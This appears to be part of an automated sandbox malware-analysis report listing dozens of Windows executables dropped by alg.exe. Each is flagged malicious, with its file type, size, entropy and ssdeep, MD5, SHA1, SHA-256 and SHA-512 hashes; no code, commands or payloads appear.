                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:fWgXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:fFsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:AC8CDEA3609EA17396F05167F20E75E2
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:6B954DBF596A5E51DE65F94622E40092D4286CF8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:95265D3441DA7A4F3551A7A7959A7BBB3F9BA80E187AF8C1D35180CE4B21E174
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:36284471FDC78298F11133D8ECB88EBB92DC0D2AF0C5F3F033BDDF2F5C8562C079680E7F9281AEB081A30A20E376FE49D68D11E94BF5549EFCC7B42FC9CB3710
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):6210048
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.386706691841893
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:eDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTX8:/nN9KfxLk6GEQTX5UKzNDjD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:4185623B4CD68730C65EBA24B4CB3F4E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:F0BA9F474AB9808179BE9D86602A23C8ED26080E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:EC193017DDA7163444BB3501DCA1296C527269DFD5B03C6CB3693EBF19756D31
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:6BFD514440B2F8D5D27C1F748E9906B1B6BFED6F0A1D576CD16F374C5B0D8693829F65965264ED261FC13972F60C207D24CC7A36FAF74043333A3D5D54F995BD
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1157120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.041483387523454
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:aNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:aNsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:0F0FAC3B05B020E9601890B4083C7DEA
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:0AE6B2513F64F08D81DD88BBA0A1A2FA8C7C8F8B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:B83833F1BD43DB993DCEF27AC11CE78D748291A20C7066D818B3D1CE14561566
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:57407D8041120B865021DA8AE5FCE5483779D17C0DDF0DB58908B8D5E6F44F7FF91250FB98FA164D3CA347D13DBBC03E1F2D57255B39DAD7337758B4305AD3A4
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):12039168
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.596680962421033
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:98304:Eb+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgK6D527BWG:2nPgTHIwZoRBk9DdhSUEVIXgK6VQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:10664A9E5BBBFA08F333D8549F4150B1
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:9FA0CEEFECFFBC94588D773C3810DFE6F5ED78BA
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:51ADBC7BC2881DF800F0E4374D1B9BA020AF7241A36F2DB26737C1DF5A848DFF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:FD530268E676897F75F02F866C94E7AC048CF4C57D996A6FB46F1B0E8DED786E0D2BB7B7A3AE2C16B90385FA2188E531D8CCE0B5E9631A59B6B391C634509647
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1322496
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.281823268545724
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:Cg5FvCPusGsqjnhMgeiCl7G0nehbGZpbD:Tft9Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:2F7E1EC6F94CA16CCD6FE6C5EFB1D7F0
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:39B4284D6D6C2E61ABEDE24FEAE8C439AC8CED1C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:852CC4469DC35061959D2859082C6F3D9C726F36DB720E26A746B4533573E187
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:547DB74B64A0A9F605847858B5CC9959A33EDB65D1C0A7C3AE93B1F5F092EBF4CC0ECC44965BED5F9F313B485E4B6A545999EDB8BD5B4B3790D856282C34F6C9
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1339904
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.208903911815308
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:VjKTIsAjFuvtIfmFthMaT5U8aChaeuUsqjnhMgeiCl7G0nehbGZpbD:VjIMmPh7TT79lDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:28482DD0290092577A63AE2A4F8EA2D3
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:90C1A09825964295895404D07E987ADED64B4194
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:3D133D97B13D5D7EA6FD5A055B88325A17244701302A1A60E0D2EBC434A3ABC7
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:060052F546C4D504848774A548C13F218213E9146877FCB887F75D15F148D9D9CC6AA196E1B081E3C2CD63360B888B355EA8FDB87A879A636DB58F20550A991E
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1515520
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.4117805147458045
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:zGqVwCto1Gm5WgQsqjnhMgeiCl7G0nehbGZpbD:CZ1GmUTDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:58107AE475C98789781CF6EA22D33523
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:78C3F902901F90890FBB7D461E02E7BFB371AEC9
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:66BD63B57ADFF0A55E49C5D13AD4477927E6D1D529CF0FA4AA4F1D3FDC807B02
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:EB736C32EBE234063C2D00D925AD2E20477EFD951F82ABAB52CB2D227F9171B95F787DC6501B892B06242AC334771936B5D62D75C23558567BF2ABA6B4BE5050
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1253376
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.15741608264454
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:ZWBW0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ZWBW0sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:C46B1938220A486686F45B71434BB752
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:2BE914E3B9756AADCFE66B5F25E0BCDA57B20CC0
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:D84AA8C846E1D42A619D3364194276F2ECCEB5CCE5B5A60ADE98AC1FD7E7AAA5
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:D497E023F87C976A22C9611431A559A903C2FB709FE64D51C83A9858AEF80491FF0CB01249CD0E06481108FF3199D22D40FB279495445F2C6CF0CFA072A95082
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.228508293593921
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:yf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0TsqjnhMgeiCl7G0nehbGZpbD:y+GtCi27mVTyT+a0XDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:6749B767140513968E0317FB3099BABF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:DB26E86F616CCDE6FCC71150970B3F7A85646EB5
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:18E32B020C7D04C34F3C148D6F62C19B36B85CE145CA6C5B739CD15835A09078
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:C9AA26FA2330CF2BBA8BFA5D0CBB8C47BDC4481139C9662A7439B2C6A77E038001BE459641D076A4F4E8B10054D6A408E4C54AEE2A74A12B479E078642420467
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
Process: C:\Windows\System32\alg.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 3110912
Entropy (8bit): 6.649667847098947
Encrypted: false
Malicious: true
Reputation: unknown
Process: C:\Windows\System32\alg.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1588224
Entropy (8bit): 5.531936251957351
Encrypted: false
Malicious: true
Reputation: unknown
Process: C:\Windows\System32\alg.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1338368
Entropy (8bit): 5.352663717255702
Encrypted: false
Malicious: true
Reputation: unknown
Process: C:\Windows\System32\alg.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1143296
Entropy (8bit): 5.022673123502782
Encrypted: false
Malicious: true
Reputation: unknown
Process: C:\Windows\System32\alg.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1161728
Entropy (8bit): 5.047161515679695
Encrypted: false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.499791540508108
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:rtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755KDmg27RN:rjEIa4HIEWOc5UD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:29DB7EC01038E03257BB3049B474E083
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:EB1FADCDFF9C516EFD868299F17A7C3DB2C43593
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:9704D33E11B4C0343AE1EEDF58897B59156387DA0D478677DA2B9931AE78ED99
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:27638CD722D54B46BAED7BADE215D3E981CB46294B89B7BC35E77B75775B0DCDE59E766BAE01E39F6034A96F7EEDAF8033EC73FD47E8A27183BCA9AC90F86353
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999367302754471
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:1572864:+Qb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:9XhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:2F6BD7BA153FE669A832E2E9E1A03984
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:8C296859E4EEF4C19C5BC97F176C1961038897FC
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:348CA56C9854CDEB896E46C39DD13F13E092E3CE0C263049627A6B4DD5F82B42
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:8EC194D62156ADF57B7BA4A545B8649660181FC810F28F8601F5403E01C54A462C5DCC76B4296DC1C453D5435945A90D2E66E7846BF0114B9843D859EEB003C0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1230336
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.185604940316724
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:OejVWYUA/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:LjkY7/sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:C8D5768EFBF61890D664C96168514D3C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:E4036E64D2010C4F13271B9C6EC236B86E31E965
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:4CADB7B5DEEB5A8262AA4092FBE913DF97EC88036B9D95E62AF614206A805E23
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:3E71644F41B6BDDB488B0366C52515CEF2C59D2AD8AC9918BA468353449E08870E84AA65A8799BAD728FE5331DBA7754CD12B80D0F1320E72A24C4FDDB9DA108
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1384960
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.377819560099198
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:ixwSJhkrmZsrsqjnhMgeiCl7G0nehbGZpbD:iy+krKsfDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:41193569F99026A3412F0B99F06C3B83
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:999A40C8DFA8175861EC3921EE1813228F2D4C7C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:B05BB8D61796E076A2A0038BBDCD61CDA9415C905585149ED5D09D499E1B5311
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:2250A76E674DE8388EDA1F1373014FCC2E83376D056EBB5CFED055A19E8D565C64FB5BA201FB4F7C1428193AF2066AB12EA160D107EE89C14B3731FC5E60F77A
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1649152
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.632748301546533
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):5365760
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.450972577765401
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):3163136
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.972781289619796
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1213440
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.204926318607787
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1388544
Entropy (8bit):5.272936443145657
Encrypted:false
SSDEEP:12288:WwkNKiZ+R2GGNUbTF5oXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:WzNKUE5osqjnhMgeiCl7G0nehbGZpbD
MD5:F6E16646EC8FDC1257293726E7746FF7
SHA1:7141D7CF5BA6D788B71157543EAF5F5F9EB48A90
SHA-256:04574A64C941AE64D16CFB687A92AE5226CC688C18F048E5682262C38AFF0A76
SHA-512:1EDEE99F755B945053F29915ED9D78D95FD50A0CCED2CD5DF8B05C1ABBBDD4606A9D3183CCE610E735BF544B2249221D47FC46404250FE0E7810053E44A0BA5E
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):5855744
Entropy (8bit):6.574338028005656
Encrypted:false
SSDEEP:98304:ZALuzDKnxCp3JKNrPJzruaI6HMaJTtGbVD527BWG:iaGg3cFPIaI6HMaJTtGbVVQBWG
MD5:319820604D2FEE2C0C0B8CF35675A8EB
SHA1:86F58977E609F6C200ABDD0EC964ADFBC868A562
SHA-256:91A0D695A2B3D8742029173E4BF95147C276534AF45E95DD8C129451819EAD74
SHA-512:B31DA3515BAFD25AC403722352F23E55687B4CBC30DEAEF3D80097D215DA9C1F7B57B1CE6DAC46CA582AE826B97340DE32538ACB94098EF06E9D3A810132D139
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1312768
Entropy (8bit):5.356044040310824
Encrypted:false
SSDEEP:24576:mXr/SVMxWHsqjnhMgeiCl7G0nehbGZpbD:O1xqDmg27RnWGj
MD5:953A2973BAEF29244EE7B31300E8AE80
SHA1:EF522D5F8CB9611A97862DA5C60736A8B4F9B7A1
SHA-256:AEF6AB5A6F97B26214AEFAAF62AB4F29CF3F63D836041C1904F0466F9775BF9E
SHA-512:18B02DCB8F7DDC8CF5FCC399CD73293E5E2324301DB55F096C89C75A93EA31C8DABEEA4620461A29C1DD40EDF14E65304EA9CB0A2BEC3E64B1AFE8251CB08106
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):27533312
Entropy (8bit):6.248637380215837
Encrypted:false
SSDEEP:196608:phRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOJVQBWG:phRCpGpMJMrbp8JjpNdNlc5rB
MD5:B4131BC8905AE0EE30A36D226F4DA63B
SHA1:54D13102784CEB6B99851F7DAF7CE05D56976E7D
SHA-256:9D3C084D7AEA6D750AE43D54BDD0E6393AA9DB59E8B18B2484B4033EDD53C86F
SHA-512:8C449F315A8FB1BF9E44CECA98DCDF5B0B6474AE53A8F5402DC0EAF753EA247CA125AEC513B847DC15B0F8B0F0545702D23B91DBF226E01401405AF4C7A3596C
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2199552
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.789011918050217
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):4971008
Entropy (8bit):6.670844982788862
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4897792
Entropy (8bit):6.829764451234003
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4897792
Entropy (8bit):6.829769312056469
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2156544
Entropy (8bit):6.953591012845516
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2370560
Entropy (8bit):7.03240003276524
Encrypted:false
SSDEEP:49152:OAMsOu3JfCIGnZuTodRFYKBrFIbWpvDmg27RnWGj:OAMa38ZuTSJD527BWG
MD5:4E136F59B9901A823452006B9329B8BB
SHA1:D8CD62CFF4FABEE723A11E54C08B49328FD037F8
SHA-256:FBB8BB0BF6D20F2D7334BAE8267E2B1F77638E1F0C2CA703B2116CDD255F6A30
SHA-512:FDBA68F5A2DE8FED25C49C6FD27BC3CD834B71FDE96BBEE2CABF5AF27EC14257026A7939D2EEE673C3369D319B349373DB40AAB2B63F4D90E2B7C692A6A03750
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1984512
Entropy (8bit):7.1043466284375425
Encrypted:false
SSDEEP:24576:DwbK7tnhD4aH6wD2Krx5NgOOagWE842sqjnhMgeiCl7G0nehbGZpbD:DSK7Fhslq2EPfOQEmDmg27RnWGj
MD5:EBA91F9B5C3D0D5BF0CE0A1235AC7845
SHA1:2B809E525D95317CCDB71D7BACA037E24884C23E
SHA-256:68CE45B9C06AB03FCB319563AB0E5824154B8D0D619B5E7C2F40A57616F09CD1
SHA-512:349973902D8471A4CD677D9E770C748BC5108EC298A6A2625B78DA6DB164E11934F6AB5F4C7CE6D9466F2278F8220BB773B4216D28076909D733BB137BEF4C00
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1779712
Entropy (8bit):7.158079769787743
Encrypted:false
SSDEEP:24576:2KI7Twj5KDHxJ1FxyD+/wsG1pbbxGsqjnhMgeiCl7G0nehbGZpbD:2v7e0j31mD+/wDxb8Dmg27RnWGj
MD5:7F964A237EA4A90EFA59E6CD021131A7
SHA1:356232427F302A058B48D3CF2B9D936A858C70A9
SHA-256:14B621F7F928DDA5BD3F89F1EEFC298AE0797569E0ADC02C584EE92DABF3A773
SHA-512:91A4EACF50D71811FFBAA3A20790B158B047478E0CDC1E37F49FC778D9537236984E92B21C5F1957A4AFD6F6092801889657F6495088E0EC258D76802C5DCDCB
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1378304
Entropy (8bit):5.377442027750052
Encrypted:false
SSDEEP:12288:pQUVPDHhS9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:6yhS9sqjnhMgeiCl7G0nehbGZpbD
